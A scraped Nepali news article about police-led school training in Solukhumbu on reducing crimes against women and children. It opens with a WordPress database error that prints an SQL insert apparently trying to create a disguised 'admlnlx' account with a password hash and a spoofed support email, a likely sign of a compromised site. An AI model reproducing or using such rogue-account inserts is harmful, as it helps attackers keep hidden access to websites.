WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQ/Nyi1NoKlWDGKdTXzzDgQDa.pOea.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 05:12:59', '', 'admlnlx', 'admlnlx')

महिला बालबालिका माथि हुने अपराधको न्यूनीकरण वियषमा प्रशिक्षण सञ्चालन – Gaule Khabar

महिला बालबालिका माथि हुने अपराधको न्यूनीकरण वियषमा प्रशिक्षण सञ्चालन

महिला बालबालिका माथि हुने अपराधको न्यूनीकरण वियषमा प्रशिक्षण सञ्चालन

सोलुखुम्बु, २९ मंसिर । लैगिक हिंंसा बिरुद्धको १६ दिने अभियान अन्तर्गत माप्य दुधकोशी गाउँपालिका र जिल्ला प्रहरि कार्यलय सोलुखुम्बुको संयुक्त आयोजनामा माप्य दुधकोशी गाउँपालिका वडा नं. २ मा “सामाजिक अपराध बिरुद्धको अभियान महिला बालबालिका माथि अपराध न्यूनीकरण” कार्यक्रम सम्पन्न गरेको छ ।

माप्य दुधकोशी गाउँपालिकाले मंसिर २८ गते शुक्रबार, वडा नंं. २ स्थित बासा खाली मावी बासामा कक्षा ७, ८ र ९ का विधार्थिलाई प्रशिक्षण कार्यक्रम सञ्चालन गरेको छ । उक्त तालिम बाट बाल विवहा न्यूनिकर, अपराधीक मानसिक्ता ब्याक्ती वा समुहको न्यूनिकरन, समाज बिकास गर्नको लागि क्षमता बिकाश चेतना बिस्तार, नागरिक समाज, सामाजिक संघ सस्था, सरकारी कार्यल, संचार माध्याम लगाएतका भूमिकाको बिषयमा प्रशिक्षाण दिइयो ।

गाउँपालिका अध्यक्ष बुद्धिकिरण राईको अध्यक्षता तथा जिल्ला प्रमुख अधिकारी नरेन्द्र राणामगर प्रमुख अतिथि र प्रहरी नायव उपरिक्षक शालिकराम शर्माको बिशेष अतिथिमा सञ्चालन भएको थियो । कार्यक्रमा बिशेष अतिथि शर्माले “सामाजिक अपराध बिरुद्धको अभियान महिला बालबालिका माथि अपराध न्यूनीकरण” को विषयमा प्रशिक्षण दिए ।
माप्य दुधकोशी गाउपालिका अन्तर्गतको वडा न ४ र ३ को माविमा प्रशिक्षण कार्यक्रम सम्पन्न भाईसकेको छ भने वडा न १ र ६ मा रहेको माविमा चाडै प्रशिक्षण कार्यक्रम सम्पन्न गर्ने गाउपालिका उपाध्यक्ष जुनिता मगरले बताए ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका